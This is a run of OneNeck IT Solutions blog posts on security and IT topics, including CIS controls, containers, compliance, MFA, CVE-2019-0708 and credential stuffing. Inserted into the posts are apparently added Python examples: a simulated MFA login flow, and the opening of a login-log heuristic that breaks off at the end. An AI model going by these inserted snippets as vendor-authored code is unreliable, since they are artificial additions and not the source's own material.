At OneNeck, we believe that no matter where you are in your security strategy execution, the CIS controls provide prioritized, actionable steps to define and implement a security strategy. While there’s no one-size-fits-all approach to security, today’s organizations can lower the risk of a breach by changing their approach from strictly meeting compliance mandates to a risk management approach that uses practical and proven best practices.

OneNeck CISO, Katie McCullough, puts it like this… “Customers don’t have unlimited spend to go after security. So, at OneNeck, we work with our customers from a risk management perspective. What are their biggest risks? How do we leverage the investments they’ve already made? And how do we maximize their budget? Because the answer isn’t always buying a new security product. It might be microsegmentation of your applications. So, we’re not here to sell them a security product. We are here to help them define and implement risk management for their particular needs.”

In addition to guiding our customers with CSC best practices, internally at OneNeck, we establish practices in alignment with the critical security controls. We follow the advice and recommendations we give our customers, and as an experienced Managed Services Provider (MSP), we’ve seen firsthand how alignment with proven best practices is key in preventing attacks.

If you’re still not sure where to start when assessing your risk, we’d be happy to discuss your options. With the help of our security team, you don’t have to go it alone. Using the CIS 20 Controls as a benchmark, we can help identify the security risks unique to your business, develop a prioritized plan to mitigate risk and assist you in implementing a plan that keeps you safe from current and future attacks.

When it comes to avoiding risk, what is OneNeck doing? https://www.oneneck.com/blog/when-it-comes-to-avoiding-risk-what-is-oneneck-doing/ Wed, 23 Oct 2019 19:00:00 +0000

Security is intrinsic to our services (for all customers) and organization (all the way to the president and CEO of our parent company TDS Inc.). It’s part of every service we develop—from start to finish. Additionally, we leverage the Critical Security Controls (CSC), outlined by the Center for Internet Security (CIS), to complete our annual security assessments and third party audits.

The Critical Security Controls provide a series of cybersecurity actions prioritized by their criticality in preventing cyberattacks. In particular, the first six controls (referred to as the Basic Control set, see below) focus on cybersecurity “hygiene.” Studies show that implementation of these first six CIS Controls provides an effective defense against about 85 percent of the most common cyberattacks.

[Figure: CIS Controls]

The OneNeck Security team focuses on providing timely input into developing new services, securing current IT infrastructure and systems so customers can rest assured we are ready and able to meet demands for secure services.

Internally, we establish practices in alignment with the critical security controls. It’s important we follow the advice and recommendations we give customers in order to demonstrate quick and effective ways we’re prepared to address aspects of the Critical Security Controls.

Customers count on us to have a rigorous security framework in place and to submit our work to outside resources for audit. Having third-party vendors perform internal audits (just as we do for SSAE, HIPAA, etc.) provides verification that we have the evidence in place we claim to, thereby avoiding potential bias.

To begin assessing the broad scope of security and compliance needs your business faces, our virtual Chief Information Security Officer (vCISO) service can help. With the help of our team, comprised of security experts who stay current on emerging threats, you can bypass the hassle of hiring an in-house CISO and immediately bring in the security leadership you need to assess and improve your overall security posture.

Containers 101: Benefits of Containers vs VMs https://www.oneneck.com/blog/security/containers-101-benefits-features/ Tue, 01 Oct 2019 19:00:00 +0000

Although containers aren’t new (they have been built into Linux for 10+ years and have been available in FreeBSD, AIX and Solaris), containers seem to be all the rage, and for good reason. The agility containers can bring to an IT team alone makes them appealing, but add in the security benefits that the self-contained nature of containers brings, and they seem like a no-brainer. But even with numerous benefits, there is also a lot of confusion about what they really are and what the best-fit scenario is. So, we thought we’d break it down…

First and foremost, are containers and VMs the same thing?

Quite simply, no. It is a very common misconception that containers and virtual machines (VMs) are interchangeable, or at least similar, but they are not. So, let’s start by defining each…

[Figure: containers vs. VMs]

VMs are:

  • As server processing power and capacity increased, individual applications could not take advantage of it all, so virtualization technology was created to allow multiple “virtual computers” to run on a single piece of bare-metal hardware.
  • A “hypervisor” (or VM manager) creates and runs VMs and sits between the hardware and the VM.
  • A single server can host multiple VMs. A Windows Server VM and a Linux VM can run side by side on the same physical machine.
  • Each VM has its own operating system, libraries and applications.
  • VMs can be gigabytes in size.
  • VMs can consolidate multiple applications onto a single system with heterogeneous operating systems.
  • A VM’s primary goal is to increase the utilization of the underlying physical machine.

[Figure: containers vs. virtual machines]

Containers are:

  • Containers are pieces of software that sit on top of the physical server AND its host OS (Linux or Windows). The OS kernel is shared across containers. Containers may also share common frameworks and libraries (e.g. .NET, JVM). In other words, the container has the entire runtime environment, minus the host OS.
  • Containers are light, usually megabytes in size, where VMs are often gigabytes in size.
  • Containers are good for taking a monolithic application that would require purchase of new hardware or configuration of a new VM and allowing it to scale on existing deployed VMs.
  • Containers allow software to run reliably with minimal changes when moved from one computing environment to another, such as moving a container from an on-premises environment into a public cloud.
  • In the figure, App1, App2 and App3 could be monolithic applications, 3-tier applications or microservices. Notice the single OS, which is shared across the containers. A container’s primary goal is consistency of the software environment regardless of where it is physically residing.

What are the benefits of containers?

There are very clear benefits that come with the adoption of containers:

  • Containers are only tens of megabytes in size versus a VM that would be gigabytes in size.
  • VMs take minutes to boot up the operating system and then start an application, while containerized applications start almost instantly. At scale, this allows for “just-in-time” creation of multiple instances of an application.
  • Containers are more modular. Applications can be split into modules and deployed as microservices (e.g. front end, business layer and data layer would each be their own modules).
  • Containers allow enterprises to deploy and scale existing monolithic applications without the need to procure new hardware and/or new VMs. In many organizations, it takes weeks/months to purchase new hardware or deploy a new VM into their environment, where containers allow for a much shorter deployment/update cycle.
  • Containers and Container Orchestrators allow for a smoother and more efficient DevOps Practice by helping to enforce consistent environments.
  • Containers allow for less effort to break apart monolithic applications and convert them to a microservices architecture.
  • Overall, containers enable a much more agile software development lifecycle.

So, what are my options in containers and orchestrators?

Container Orchestrators (aka container management) provide tools to allow for deployment, scaling, availability and management of containers, both on-premises and in public/private clouds. They’re essentially a manager of your containers across multiple physical environments. The current most popular ones are:

  • Docker – Open Source, most popular
  • Apache Mesos – Open Source, includes orchestration
  • Kubernetes – Open Source, most popular container orchestrator
  • Red Hat OpenShift – On-premises private platform as a service for RHEL

All support the Open Container Initiative (OCI) under the Linux Foundation. This is important because all major providers are members of OCI/Linux Foundation.

In addition, Microsoft Azure has some excellent container service offerings:

  • Azure Container Instances – Create a container instance by pointing to your Docker image in the Docker Container Registry. Essentially, containers on demand.
  • Azure Web App for Containers – Like Azure App Services, but instead of publishing your code directly into Azure you point the App Service to your container in the Docker Container Registry.
  • Azure Kubernetes Service (AKS) – Fully managed service for deploying and managing container applications. Provides a “serverless” experience, integrated CI/CD and enterprise-grade security.
  • Azure Service Fabric – Native Azure microservices using container images for both Windows and Linux.
  • Azure Batch – High-performance/high-scale computing with containers, including job scheduling.
  • Azure Container Registry – Store and manage container images across all types of Azure deployments.

So, why don’t we move everything into containers?

Containers can run all sorts of applications, but because they are so different from VMs, a lot of the older software that many enterprises are still running won’t translate to this model. However, VMs can be used to move older applications into a cloud service. So even though containers have their benefits, VMs still do too. It really boils down to… it depends.

————

Want to learn more? Download the informative eBook Containers for Dummies from our partner, HPE, and learn why container technology is a critical piece of IT modernization solutions that will drive digital transformation, hybrid environment adoption and hyper-convergence.

Topic: Containers vs vms

Components of Successful IT Security | OneNeck Solutions https://www.oneneck.com/blog/security/components-of-successful-it-security-practices/ Tue, 27 Aug 2019 18:30:00 +0000

In its simplest form, compliance is about setting rules and following them, every time. No wavering, no audible—everyone simply follows the rules—every time. Seems easy, but it’s not always.

There are many reasons rules are broken (e.g., not paying attention, not listening, forgetting there were rules, etc.). The reason isn’t really that important. What matters is what transpires when the rules aren’t followed—compliance is directly impacted. After all, compliance is all about executing on processes, training, documenting and continuous inspection/improvement–every single touch or transaction!

To verify our company is following the rules, we invite third-party vendors to audit our processes annually.

These audits* include HIPAA and HITECH examinations; ISO/IEC 27001:2013 certification; SSAE 18 examinations; and PCI DSS validation. In addition, the Security and Compliance team continuously monitors for new regulations and creates process to comply with them (e.g., GDPR, California Privacy Act, etc.) and performs client-specific audits, such as the NIST SP 800-171.

Every audit is critical and serves a specific niche or need. They include a breadth of frameworks and wide-range of industries and geography. And, there’s often a great degree of overlap with industry-specific audits that our clients must demonstrate compliance with. Therefore, once we scrutinize the scope of the third-party audits we submit to and the scope of the client’s audit requirements, we often find our audits completely fulfill the industry-specific obligations.

For example, in a recent conversation, a potential client in the mortgage/banking industry referenced needing a partner that could demonstrate FDIC compliance. While OneNeck doesn’t specifically undertake FDIC compliance auditing, on reviewing the FDIC requirements we demonstrated how our SOC 1 and SOC 2 attestations (available under NDA) and ISO/IEC 27001:2013 certification fully meet, and in some cases exceed, the controls outlined in the FDIC adherence guidelines.

In other situations, clients need audit verification of technical, physical, management and administrative controls, including background checks and annual training. We’re able to validate that we meet these requirements based on the annual audits we already participate in.

In addition, for clients that leverage us for hosted and managed services or colocation, the compliance and audits directly apply to their IT environment. With these solutions, our experienced professionals will also help address all the technical measures our clients must comply with.

*Upon request, OneNeck can provide these with NDA

Topic: NIST framework cybersecurity

6 Ways to Relieve “Security Fatigue” https://www.oneneck.com/blog/security/relieve-security-fatigue/ Thu, 15 Aug 2019 00:37:00 +0000

Do you ever feel that your non-IT co-workers are trying to thwart your security protocols – ignoring software update alerts, opening suspicious emails or not following password best practices? If it seems that way, it might be “security fatigue.”

A study from the National Institute of Standards and Technology (NIST) found that 63 percent of participants have experienced “security fatigue,” defined as “a weariness or reluctance to deal with computer security.” It’s not that hard to understand.

Technology users get tired and stressed out from the efforts of remembering multiple login credentials, PIN numbers and ever-changing security protocols. The result? Making poor decisions that could result in an intrusion, exposure of sensitive data, loss of reputation or even huge financial losses.

6 “Security Fatigue” Symptoms and Tips to Relieve Them

  1. Reusing passwords. According to a BBC report, people need to remember an average of 22 separate passwords and change them periodically. Yet, 81% of users reuse the same password for different accounts and 36% reuse the password in more than 25% of their online accounts.
    Suggestion: Install a password manager that generates strong passwords, remembers them and stores them in a safe location. The user only needs to remember one set of master credentials, rather than dozens.
  2. Falling prey to phishing. According to Dark Reading, 91% of cyberattacks start with a phishing email. Employees may not know the damage they can cause just by opening an email, downloading an attachment or clicking on a link.
    Suggestion: Proactive companies build a “cybersecurity culture,” in which every single technology user takes personal responsibility for his or her role in guarding against cyber intruders. The necessary ingredients: clear rules and expectations, regular training (and testing) and solid leadership from the C-suite.
  3. Not using secure connections. It happens all the time. More and more, people work from home or from a coffee shop, maybe using a personal laptop or another device. Unfortunately, they think it’s a nuisance to log into the VPN and connect over unsecured Wi-Fi (on an unsecured device).
    Suggestion: The fix may be as simple as putting a reminder on the device’s startup screen or setting electronic reminders, or possibly simplifying the procedure for users.
  4. Not updating devices and software. Pop-ups about updating software are annoying, disturb workflow and can create anxiety. Time-crunched employees may also put off what they see as a “mundane” task (while you think of WannaCry).
    Suggestion: Security and IT staff should take control of updating as many devices and software as possible, including implementing patches, downloading malware databases and other risk-reducing tasks.
  5. Not reporting suspicious activities. What if an employee realizes that they have just been tricked by a phishing scam? They may fail to report the incident for fear they will be blamed or be disciplined.
    Suggestion: Employees should be encouraged to flag behaviors immediately, without fear of a punitive response. The organization should view human-error incidents as learning opportunities to educate users and to point IT toward potential procedural improvements.
  6. Outsourcing cybersecurity functions. Given today’s increasingly complex and perilous threat landscape, limited resources and shortage of expertise, keeping up with cybersecurity needs can overwhelm the IT group.
    Suggestion: Consider partnering with a managed services provider (MSP) that specializes in cybersecurity. A security-focused MSP can successfully reduce security fatigue so that both IT and business employees will make better decisions when cybercriminals come to call.

Want to learn more about building a cybersecurity framework that will keep your business safe?

Download our white paper: A Framework for Cybersecurity and Compliance: What You Can Learn from NIST SP-800-171.

Reasons to Backup Office 365 | Cloud-Based Data Backup https://www.oneneck.com/blog/managed-services/reasons-to-backup-office-365-cloud-based-data/ Tue, 30 Jul 2019 19:00:00 +0000

I need backup for Office 365? Isn’t it already included? In short, no. The misconception that Microsoft fully backs up your data on your behalf is all too common. To the contrary, Microsoft is primarily focused on managing the infrastructure and ensuring uptime; you are responsible for your data.

According to 451 Research, data backup remains one of the key principles in data protection for several reasons, and while SaaS vendors focus on providing infrastructure resiliency and application availability for their own platform, the traditional 3-2-1 backup rule still applies as a best practice for ensuring data protection and resilience.

Bottom line, businesses using Office 365 need to back up their data, and here’s why:

Critical Reasons to Backup Office 365

Veeam, a data backup and recovery, data protection and data security company and OneNeck partner, surveyed hundreds of IT professionals across the globe who have migrated to Office 365; six vulnerabilities in data protection rose to the top in their findings:

  1. Accidental Deletion: If you delete a user, whether you meant to or not, that deletion is replicated across the network, along with the deletion of their personal SharePoint site and their OneDrive data.
  2. Retention Policy Gaps & Confusion: Office 365 has limited backup and retention policies that can only fend off situational data loss and is not intended to be an all-encompassing backup solution.
  3. Internal Security Threats: Businesses experience threats from the inside, and they are happening more often than you think. Organizations fall victim to threats posed by their very own employees, both intentionally and unintentionally.
  4. External Security Threats: Malware and viruses, like ransomware, have done serious damage to organizations across the globe. Not only is company reputation at risk, but the privacy and security of internal and customer data as well.
  5. Legal and Compliance Requirements: Legal requirements, compliance requirements and access regulations vary between industries and countries, but fines, penalties and legal disputes are three things you don’t have room for on your to-do list.
  6. Managing Hybrid Deployments & Migrations to Office 365: Organizations that adopt Office 365 typically need a window of time to serve as a transition between on-premises Exchange and Office 365 Exchange Online. Some even leave a small portion of their legacy system in place to have added flexibility and additional control. These hybrid email deployments are common yet pose additional management challenges.

Comprehensive Backup from A Trusted Partner

We’ve worked with many organizations to safeguard their data with a flexible, secure and efficient cloud-based backup and recovery service your business can rely on.

OneNeck can enable and support your Office 365 backups, helping to eliminate the risk of losing access to and control over your Office 365 data. Our backup solution gives you the power to securely back up Office 365 and:

  • Protect your Office 365 data from accidental deletion, security threats and retention policy gaps
  • Quickly restore individual Office 365 email, files and sites with industry-leading recovery flexibility
  • Meet legal and compliance requirements with efficient eDiscovery of Office 365 items

Let us help you gain complete access and control of your Office 365 data and avoid the unnecessary risks of data loss. Contact us today!

Topic: Microsoft Office 365

Enhance IT Security with Analytics-Driven SIEM
https://www.oneneck.com/blog/security/enhance-it-security-with-an-analytics-driven-siem/
Thu, 06 Jun 2019 19:00:00 +0000

Finding a mechanism to collect, store and analyze security-only data is relatively simple. There is no shortage of options for storing data. Collecting all security-relevant data and turning all that data into actionable intelligence, however, is a whole other matter.

According to Splunk, an analytics-driven security solution provider, many enterprise IT organizations that invested in security information and event management (SIEM) platforms have discovered this fundamental truth the hard way. The data available to analyze is based only on security events. That makes it difficult to correlate security events against what’s occurring across the rest of an IT environment. When there’s an issue, investigating a security event takes precious time most IT organizations can’t afford. In addition, the SIEM system can’t keep pace with the rate at which security events need to be investigated.

Not All SIEMs Are Created Equal

As noted above, a legacy SIEM solution can’t keep pace with the rate at which security events need to be investigated.

Splunk outlines some of the known issues with legacy SIEM solutions, which include:

  • Limited data ingestion capabilities
  • Complex deployment and maintenance
  • Inflexible search, correlation and visualization capabilities
  • Lack of scalability
  • Limited analytics capabilities

Enterprise IT requires wider and deeper insights to identify emerging threats and attacks and to eliminate many of the manually driven tasks that are weighing IT security pros down. Enter the analytics-driven SIEM solution.

Analytics-Driven SIEM

An analytics-driven SIEM connects the dots faster to help predict patterns, identify suspicious behavior and automate corrective actions in real time, so that IT can respond quickly to incidents and damage can be avoided or limited. According to Splunk, a modern, analytics-driven SIEM solution needs to have the following seven capabilities:

[Splunk graphic: the seven capabilities of an analytics-driven SIEM]

The Advantage of a Managed SIEM

OneNeck partners with the best, like Splunk, to deliver solutions that can help optimize IT and enhance security. We can help you implement, monitor and maintain your SIEM solution.

And our managed SIEM service offers scalable, real-time security monitoring and analysis to help our customers detect threats and meet compliance requirements.

Speak with a OneNeck security specialist today about how our comprehensive approach to SIEM can protect your data and your business.

How to Create Effective Defense Against Cybersecurity
https://www.oneneck.com/blog/security/strong-external-security-for-effective-it-cybersecurity/
Tue, 04 Jun 2019 18:44:00 +0000

Creating a strong external security posture is critical. But what can businesses do to protect their data and environments?

Concerns about security are escalating. Nearly every day, new malicious attacks, phishing attempts and malware are identified. In addition, new vulnerabilities, such as the exploitable vulnerability recently identified by Microsoft, continue to be discovered. It all leads to the same challenge: how do you create a strong security posture to protect your business?

Leveraging the Center for Internet Security’s (CIS) Critical Security Controls is a solid place to start and is part of the evaluation provided with OneNeck’s vCISO service. The controls—which OneNeck leverages to complete annual security assessments and third-party audits—are a series of cybersecurity actions prioritized by their criticality in preventing cyberattacks. In particular, the first six controls (referred to as the Basic Control set) focus on cybersecurity “hygiene.” Studies show that implementation of these first six CIS Controls can provide an effective defense against about 85 percent of the most common cyberattacks.

[Figure: the six Basic CIS Controls]

In addition to leveraging the CIS controls, using third-party penetration (pen) testers offers businesses a way to ensure the controls put in place are effective. OneNeck leverages third-party pen testers at least annually. A recent pen test revealed OneNeck has “Strong External Network Security Controls” in place and that our systems and services are well-patched and maintained.

In large part, this positive commentary is due to the fact that we scan our external facing services multiple times a month. We also perform detailed internal security scans, which provide a holistic understanding of the security of our environment. Don’t take our word for it though; contact your Account Executive to request a copy of our penetration test report.

Security Rating Services (SRS) reports are another tool many businesses rely on to evaluate the security practices put in place by potential IT partners. Generated by companies such as Bitsight and RiskRecon, the SRS reports are similar to a “credit score” in that the scores vary based on the data available. Instead of reporting on a provider’s full environment, SRS reports only include external facing data (e.g., web servers that face the internet). In fact, a provider’s internal practices are completely overlooked, primarily because the SRS aggregators don’t have access to a provider’s internal-facing data.

In addition, most SRS reports assess all IP addresses assigned to a company through ARIN. For a company like OneNeck, because we offer colocation services, we have IP addresses assigned to company-owned and controlled devices AND customer-owned and customer-managed devices. In these instances, where the customer owns and manages their devices, OneNeck does not have authority to access or make changes to the devices. This scenario became very evident recently. An SRS report identified more than 2,000 IP addresses (affiliated with OneNeck) that had been scanned; however, nearly two-thirds belonged to customers for whose environments OneNeck had no access or authority to make changes. Of the OneNeck-controlled devices, all of the vulnerabilities had been previously discovered through our own internal scanning and were being actively addressed or retired.

The bottom line: creating a strong external security posture is critical. There are many tools and steps businesses can leverage to protect their data and environments. As always, it’s important to understand the details, verify the reports, and ensure equivalent data is being compared.

——–

Want to learn more? Check out additional security resources here.

Older Windows Systems Beware of CVE-2019-0708
https://www.oneneck.com/blog/older-windows-systems-beware-of-cve-2019-0708/
Thu, 16 May 2019 21:27:00 +0000

Are you running an older version of Windows and not current with your patch management? If so, you need to be aware of a recent exploitable vulnerability that just hit the news this week. Here’s what you need to know…

Microsoft released fixes for a critical Remote Code Execution vulnerability, CVE-2019-0708, in Remote Desktop Services – formerly known as Terminal Services – that affects some older versions of Windows. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user interaction.

Simon Pope, director of incident response for the Microsoft Security Response Center, wrote, “In other words, the vulnerability is ‘wormable’ – meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer.” He also stated, “While we have observed no exploitation of this vulnerability, it is highly likely that malicious actors will write an exploit for this vulnerability and incorporate it into their malware.”

Because of the severity of the vulnerability, Microsoft is providing a patch for out-of-support systems, such as Windows XP and Windows 2003.

Customers running Windows 8 and Windows 10 are not affected by this vulnerability.

Vulnerable systems include:

  • Windows XP
  • Windows 2003
  • Windows 7
  • Windows 2008 R2 and Windows 2008

If you’re still unsure that you’re protected, OneNeck’s security experts are here to help.

Security vs Compliance | IT Security Services
https://www.oneneck.com/blog/security/security-vs-compliance-it-services/
Thu, 16 May 2019 19:00:00 +0000

It’s no secret… security attacks are on the rise:

  • Within the past year, leading global companies have seen sales and revenue impacts as high as $300 million due to malware-based cyberattacks.
  • By 2021, at least one company will publicly acknowledge a $1 billion revenue impact from a business outage resulting from a malware/ransomware attack.
  • Mobile malware is more than doubling each year, reaching levels where it can no longer be ignored. By 2019, mobile malware will amount to one-third of total malware reported in standard tests, up from 7.5% today.

To combat cybercrime, the Federal Government has released numerous compliance regulations designed to protect data and systems, including the Federal Information Security Modernization Act (FISMA) and the Health Insurance Portability and Accountability Act (HIPAA).

Further, many industries also define their own requirements. Adherence to these regulations and industry standards, such as Payment Card Industry (PCI) compliance, is a requirement for doing business in a global market.

The result: blurred lines between security and compliance. This article aims to clear up the misconceptions between the two and provide tips to help your organization strike a balance between being compliant and being secure.

Clearing Up the Misconceptions

Security = Compliance

Many organizations have the mindset that being compliant makes them fundamentally secure. Unfortunately, that is not the case. Compliance regulations are not security programs. Compliance demonstrates how well your organization meets the security-related requirements of specific regulatory standards like PCI or HIPAA. Security, on the other hand, is a collection of controls designed to mitigate risk and protect your data and applications from threats.

You can be compliant, but that doesn’t mean you’re secure.

“Checkbox Mentality”

Relying on merely checking the box and being compliant will not keep you secure and puts your business at serious risk. Why? Compliance mandates are general guidelines, but do not reflect what individual companies need in terms of security.

In addition, compliance requirements are mostly reactive rather than proactive in nature, often changing slowly and predictably. The threat landscape, however, is constantly evolving. As a result, many compliance mandates are a few steps behind the most current threats.

Compliance is a blueprint for my security strategy

Your security strategy should be built from the ground up, based on your unique needs and centered around security principles, rather than regulatory mandates. In addition, it should include considerations in regard to how your overall business views risk.

According to Jim Kennedy, contributing author at CSO magazine, many organizations are opting to define security policies based on regulatory requirements; however, the result is that their security postures very quickly become out of date. Not only are regulations typically at least 24 months old by the time they are implemented, but a compliance-only approach provides hackers with an ‘access blueprint’, as weaknesses in the security model that are not covered by regulation are clearly visible.

Finding Alignment

Addressing security vulnerabilities and the demands of regulatory compliance isn’t an easy feat. To truly protect sensitive data, both security and compliance are critical. Without a smart, thorough and active security program, coupled with a solid compliance plan, you’re at significant risk of being breached. And, while seemingly very different, security and compliance can work in harmony to achieve a common goal: ensuring the privacy and protection of your sensitive data.

A structured approach to security and compliance starts with understanding the security, risk and requirements unique to your business and your industry, measured against defined areas for assessment.

Katie McCullough, Chief Information Security Officer here at OneNeck, outlined the following basic principles:

Document Your Processes

Documentation is a key element of compliance and security. If it’s not documented, then it’s not really happening. Neglecting to document guarantees that the security and compliance programs will never function in unison as one.

Train

Training your user base to adhere to security and compliance best practices is a must. Develop an awareness training program that provides users with education on policies and procedures.

Measure Effectiveness

Make sure you are measuring effectiveness of your security and compliance initiatives. Measure process performance and controls against your established guidelines.

Improve Processes

Implement a continuous improvement process. By leveraging the metrics obtained when measuring your performance, you can facilitate continuous improvement by applying corrective actions based on your observed measurements.

OneNeck Has You Covered

Clearly understanding where you are and what vulnerabilities exist can save significant time, money and distress down the road when under attack or trying to achieve compliance. Don’t go it alone. We’re here to help you stay safe from emerging risks that leave you exposed, while allowing you to maintain a balance of productivity and operational effectiveness.

For more information, read our Framework for Cybersecurity and Compliance white paper.

How MFA Adds IT Security | Multi-Factor Authentication
https://www.oneneck.com/blog/security/multi-factor-authentication-explained/
Thu, 09 May 2019 20:00:00 +0000

TeleSign research indicates that the majority of users use five or fewer passwords for all of their accounts. While it may seem efficient for password memory on your end, you could actually create a “domino effect” that allows hackers to take down multiple accounts by cracking one password.

There’s an easy, more powerful defense out there… enter Multi-Factor Authentication (MFA).

What is MFA?

Multi-factor authentication is based on the concept of requiring multiple forms of identification. It stops easy access with stolen credentials by requiring a second level of authentication after the user enters their username and password.

You’ve probably used MFA before, even if you weren’t aware of it. If a website has ever sent a numeric code to your phone for you to enter to gain access, for instance, you’ve completed a multi-factor transaction.

How Does MFA Work?

According to Duo, a typical MFA transaction happens like this:

  1. The user logs in to the website or service with their username and password.
  2. The password is validated by an authentication server, and if correct, the user becomes eligible for the second factor.
  3. The authentication server sends a unique code to the user’s second-factor device.
  4. The user confirms their identity by approving the additional authentication from their second-factor device. 

While the basic processes behind multi-factor authentication are generally the same across providers, there are many different ways to implement it, and not all methods are created equal.
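The four-step flow above, simulated end to end as an added example (not Duo's or OneNeck's code): the password is checked against a salted hash first, and only on success is a short-lived, single-use code issued to the user's second-factor device; the user, password and "device" are constructed for the demo.

```python
"""Simulated two-step MFA login (added example, not Duo's or OneNeck's code).

Step 1: username/password checked against a salted hash.
Step 2: only then is a short-lived, single-use code issued to the user's
second-factor device, and login completes when that code is confirmed.
All users, secrets and the "device" are constructed for the demo.
"""
import hashlib
import hmac
import os
import secrets
import time
from dataclasses import dataclass, field
from typing import Dict

CODE_TTL_SECONDS = 30   # how long an issued code stays valid
CODE_DIGITS = 6


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2 hash; a real deployment would tune iterations higher."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


@dataclass
class User:
    salt: bytes
    pw_hash: bytes
    device: list = field(default_factory=list)   # constructed "phone inbox"


@dataclass
class PendingCode:
    code: str
    issued_at: float
    used: bool = False


class AuthServer:
    def __init__(self, clock=time.time):
        self.clock = clock                 # injectable so expiry can be tested
        self.users: Dict[str, User] = {}
        self.pending: Dict[str, PendingCode] = {}

    def enroll(self, username: str, password: str) -> None:
        salt = os.urandom(16)
        self.users[username] = User(salt, hash_password(password, salt))

    # Steps 1-3: validate the password; on success issue a code to the device.
    def begin_login(self, username: str, password: str) -> bool:
        user = self.users.get(username)
        if user is None:
            return False
        candidate = hash_password(password, user.salt)
        if not hmac.compare_digest(candidate, user.pw_hash):
            return False   # no second factor is ever sent on a bad password
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self.pending[username] = PendingCode(code, self.clock())
        user.device.append(code)   # "sends" the code to the second-factor device
        return True

    # Step 4: the user confirms with the code from the device.
    def complete_login(self, username: str, submitted_code: str) -> bool:
        pending = self.pending.get(username)
        if pending is None or pending.used:
            return False
        if self.clock() - pending.issued_at > CODE_TTL_SECONDS:
            del self.pending[username]   # expired codes are discarded
            return False
        if not hmac.compare_digest(pending.code, submitted_code):
            return False
        pending.used = True   # a code is accepted exactly once
        return True


def demo() -> dict:
    """Run the flow against a constructed user and report each outcome."""
    now = [1_000_000.0]
    server = AuthServer(clock=lambda: now[0])
    server.enroll("alice", "correct horse battery staple")
    results = {}

    results["wrong_password_issues_code"] = server.begin_login("alice", "guess")
    results["device_empty_after_wrong_pw"] = len(server.users["alice"].device) == 0

    server.begin_login("alice", "correct horse battery staple")
    code = server.users["alice"].device[-1]
    wrong = "000000" if code != "000000" else "111111"
    results["wrong_code"] = server.complete_login("alice", wrong)
    results["right_code"] = server.complete_login("alice", code)
    results["replayed_code"] = server.complete_login("alice", code)

    server.begin_login("alice", "correct horse battery staple")
    code = server.users["alice"].device[-1]
    now[0] += CODE_TTL_SECONDS + 1   # let the code expire
    results["expired_code"] = server.complete_login("alice", code)
    return results


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check}: {outcome}")
```

The replay and expiry checks are where implementations differ most; the text's point that "not all methods are created equal" is largely about whether a second factor can be reused or intercepted.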

Benefits of MFA

MFA can:

  • Mitigate threats by providing an additional layer of protection
  • Decrease the chance of end user identities (and, subsequently, their IT resources) becoming compromised
  • Enable compliance with industry regulations such as PCI and HIPAA for privileged access to sensitive data

A Trusted Partner

With more and more users accessing their sensitive corporate accounts online, organizations are struggling to keep their sensitive information safe. Multi-factor authentication provides proven protection in a world of increasing threats. As a managed IT security services provider, OneNeck® IT Solutions is here to guide you, using a multi-layered approach, providing protection at every layer: from the DNS layer, to the network, to the endpoint. Contact us today to learn how to better safeguard your company’s valuable data.

Topic: NIST Framework Cybersecurity

IT Solutions for Disaster Recovery | A Guide for CIOs
https://www.oneneck.com/blog/managed-services/disaster-recovery-guide-primer-for-cio/
Thu, 18 Apr 2019 20:00:00 +0000

How can a CIO be confident that IT will perform 24/7/365?

According to Zerto, in today’s always-on, information-driven organizations, IT resilience depends completely on IT infrastructures that are up and running 24/7. The costs of downtime are huge and data loss can put a company out of business. Data loss is not only caused by natural disasters, power outages, hardware failure and user errors, but more and more by software problems and cybersecurity-related disasters.

Therefore, thorough security and business continuity strategies are crucial for modern businesses, minimizing data loss and downtime. Especially now, as data centers become more and more software defined, these private, hybrid and public clouds become more vulnerable to these kinds of threats.

Download Zerto’s Disaster Recovery Guide: Primer for CIOs for insights into the challenges, needs, strategies, and available solutions for disaster recovery, especially in modern, virtualized environments and the public cloud.

A Strategic, Trusted Partner

OneNeck is here to help you maximize uptime, become more efficient and adopt and accelerate with new technologies such as hybrid clouds, while running at the speed of business. We start by conducting a disaster recovery assessment to ensure a planned approach to Disaster Recovery (DR). Taking the time upfront, before implementation, to determine what’s critical to your business and your customers ensures that you deliver on your commitments no matter what. Then, we tailor our solutions to your situation. So, breathe easy – we’ve got this. Execute your disaster recovery strategy with OneNeck today.

How to Protect the Enterprise from Credential Stuffing
https://www.oneneck.com/blog/security/what-is-credential-stuffing-how-to-protect-the-enterprise/
Tue, 26 Mar 2019 19:00:00 +0000

Credential stuffing is a type of cyber-attack where hackers take combinations of usernames and passwords leaked from other sites and use them to gain access to accounts on another site. F5 states that there’s typically a 1 to 2 percent success rate, which means that if a cybercriminal purchases 1 million stolen credential records (for sale on the dark web for fractions of a cent each), they can generally gain access to 10,000 to 20,000 accounts.

Costly Ramifications

In a recent Ponemon Institute survey, respondents cited that these attacks cause costly application downtime, loss of customers and involvement of IT security that can result in an average cost of $1.7 million, $2.7 million and $1.6 million annually, respectively.

In addition, the companies represented in this research estimate that the monetary cost of fraud due to credential stuffing attacks can range from an average of more than $500,000 if 1 percent of all compromised accounts result in monetary loss to more than $54 million if 100 percent of all compromised accounts result in monetary loss.

Main Culprits

Password reuse. According to Keeper Security, as many as 87 percent of people reuse the same password across multiple accounts. And while they may not share passwords with others, they use them across multiple websites, making it easy for cyber-criminals to break into the various accounts with the same password. In addition, Ponemon also states that companies are vulnerable to credential stuffing attacks because:

  • It’s difficult to differentiate the criminal from the real customers, employees and users who have access to the companies’ websites.
  • Migration to the cloud is an important IT strategy, but it increases the risk of credential stuffing attacks.
  • Companies do not have sufficient solutions or technologies today for preventing and/or containing credential stuffing attacks.

How Can Companies Prevent/Mitigate Credential Stuffing Attacks?

Companies that wish to prevent credential stuffing attacks must take a layered security approach.

  1. Web Application Firewall – Your First Line of Defense

A robust web application firewall (WAF) is the first line of defense against credential stuffing attacks. A WAF can provide advanced bot detection and prevention. By analyzing behavior, such as IP location, time of day, and connection attempts per second, a WAF can help you identify non-browser login attempts.
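The kind of behavioral analysis described above, reduced to three heuristics a WAF or log pipeline can apply: attempts per second from one source, distinct usernames tried from one source, and a non-browser client string. This is an added example, not F5's or OneNeck's code; the log format, IP addresses and every log line are constructed.

```python
"""Login-log heuristics for spotting credential stuffing (added example; not
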